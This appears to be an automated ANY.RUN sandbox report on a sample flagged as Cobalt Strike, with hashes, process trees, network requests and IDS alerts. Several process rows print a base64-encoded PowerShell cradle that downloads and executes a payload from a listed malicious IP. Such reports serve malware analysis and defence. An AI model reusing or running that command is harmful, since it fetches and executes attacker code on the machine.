File name: | ttest.text |
Full analysis: | https://app.any.run/tasks/52fe5ab9-da76-4142-8c08-91bda0ee5c69 |
Verdict: | Malicious activity |
Threats: | Cobalt Strike is a legitimate penetration software toolkit developed by Forta. But its cracked versions are widely adopted by bad actors, who use it as a C2 system of choice for targeted attacks. |
Analysis date: | January 14, 2022, 20:35:29 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with no line terminators |
MD5: | 52CB5D2BF929392C11E48F7B7BE883FB |
SHA1: | E250BBB9F670F05D3B1D52962C7DF8E50EA06829 |
SHA256: | 16EA40F04D29F260D97E4B9D3F5AE0DCEFCE749119F34C1F212173907A9592D9 |
SSDEEP: | 6:snyUeCrgSqSCUdT14Ee2vCoj70/8QpQJQkhkrRksS/nmaa:snhrgSqJb25jckXYw/Fa |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3088 | "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL "C:\Users\admin\Desktop\ttest.text" | C:\Windows\system32\rundll32.exe | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2252 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\Desktop\ttest.ps1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
2640 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMQAxADIALgA4ADMALgAxADEANgA6ADgAMAA4ADAALwBkAHIAdgAnACkAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
3112 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\Desktop\ttest.ps1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
188 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMQAxADIALgA4ADMALgAxADEANgA6ADgAMAA4ADAALwBkAHIAdgAnACkAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
2876 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\Desktop\ttest.ps1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
2560 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMQAxADIALgA4ADMALgAxADEANgA6ADgAMAA4ADAALwBkAHIAdgAnACkAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
1292 | "C:\Windows\system32\taskmgr.exe" /4 | C:\Windows\system32\taskmgr.exe | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Task Manager Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3360 | "C:\Windows\system32\taskmgr.exe" /1 | C:\Windows\system32\taskmgr.exe | taskmgr.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Task Manager Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1108 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\AppData\Local\Temp\b87bb509-d7e5-4eef-9c5e-545e6cb556f4.ps1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2252 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UWQXBR131BVQCOF4MIX8.temp | binary | |
MD5:3C4F6C229966CFB1669BE9E688C7837A | SHA256:35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D | |||
3112 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ITO4TTKJEPUU4MJ82CTL.temp | binary | |
MD5:3C4F6C229966CFB1669BE9E688C7837A | SHA256:35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D | |||
2252 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1156e7.TMP | binary | |
MD5:CCFCF369F751CE8DA0370D84E52A7EED | SHA256:53922490C3F5A04667EC3605A01AF2A4F4F265782D1BCA519F63ACAD413F2ED9 | |||
2252 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C4F6C229966CFB1669BE9E688C7837A | SHA256:35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D | |||
3112 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1166b6.TMP | binary | |
MD5:3C4F6C229966CFB1669BE9E688C7837A | SHA256:35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D | |||
2876 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11701c.TMP | binary | |
MD5:3C4F6C229966CFB1669BE9E688C7837A | SHA256:35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D | |||
3112 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C4F6C229966CFB1669BE9E688C7837A | SHA256:35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D | |||
2876 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PHSG80632C9STIMFYKE1.temp | binary | |
MD5:3C4F6C229966CFB1669BE9E688C7837A | SHA256:35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D | |||
2876 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C4F6C229966CFB1669BE9E688C7837A | SHA256:35A2EB8E2E0AE41B3B7A5614F30F6E46FBBB11935546D66C3775B8BF85A5A82D | |||
2640 | powershell.exe | C:\Users\admin\AppData\Local\Temp\4ndimie2.mbd.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2640 | powershell.exe | GET | 200 | 185.112.83.116:8080 | http://185.112.83.116:8080/drv | RU | text | 57.9 Kb | malicious |
188 | powershell.exe | GET | 200 | 185.112.83.116:8080 | http://185.112.83.116:8080/drv | RU | text | 57.9 Kb | malicious |
2560 | powershell.exe | GET | 200 | 185.112.83.116:8080 | http://185.112.83.116:8080/drv | RU | text | 57.9 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
188 | powershell.exe | 185.112.83.116:8080 | — | Total Server Solutions L.L.C. | RU | malicious |
2640 | powershell.exe | 185.112.83.116:8080 | — | Total Server Solutions L.L.C. | RU | malicious |
2560 | powershell.exe | 185.112.83.116:8080 | — | Total Server Solutions L.L.C. | RU | malicious |
PID | Process | Class | Message |
---|---|---|---|
2640 | powershell.exe | A Network Trojan was detected | AV MALWARE CobaltStrike Trojan Powershell Payload Inbound |
188 | powershell.exe | A Network Trojan was detected | AV MALWARE CobaltStrike Trojan Powershell Payload Inbound |
2560 | powershell.exe | A Network Trojan was detected | AV MALWARE CobaltStrike Trojan Powershell Payload Inbound |